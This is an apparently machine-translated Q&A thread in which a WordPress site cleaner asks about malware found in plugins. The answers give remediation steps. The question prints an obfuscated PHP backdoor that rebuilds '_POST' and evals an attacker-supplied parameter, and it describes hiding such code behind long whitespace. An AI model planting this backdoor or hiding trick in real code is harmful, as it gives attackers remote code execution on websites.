Wordpress вредоносный код, что он на самом деле делает?

Question

Итак, сегодня я очищаю сайт моего клиента и обнаружил, что на много плагина wordpress есть много аккуратного вредоносного кода.

Некоторые из них очень аккуратно (= D), но один из лучших является старый трюк положить много отступа после <?php и положить вредоносный код до окончания его ?> и открытие еще <?php в конце строки поэтому похоже, что есть только один <?php.

Теперь, что я спрашиваю, что будет делать этот вредоносный код? Это один из примеров кода я нашел:

$qV="stop_"; 
$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]); 
if(isset(${$s20}['q571d85'])) { 
eval(${$s20}['q571d85']); 
} 

Приведенный выше код должен был выдал ошибку ($qv не массив), но это не так. Кто-нибудь может объяснить, что это такое?

Answer 1

1) Установите новый WordPress. (New) 2) Скачать все Plugin (новый) 3) Подключение старой базы данных 4) Добавить все файлы загруженные медиа 5) проверить шаблон theam & и Js файл.

Найти и заменить

$qV="stop_"; 
$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]); 
if(isset(${$s20}['q571d85'])) { 
eval(${$s20}['q571d85']); 
} 

Answer 2

в первую очередь Проверьте вашу версию Wordpress и скачать ту же версию от wordpress.org. Замените файлы wp-admin, wp-include и root с последними загруженными файлами. Как только вы сделаете это вредоносное ПО, оставайтесь в плагинах и теме. Так что просто обновите свои плагины с помощью последнего, и он также завершит работу с плагинами.

для проверки в них вы можете сканировать с помощью любого антивируса, и он найдет код вредоносного ПО. Затем вы можете вручную удалить свой почти тот же код во всех файлах.

Надеюсь, это поможет!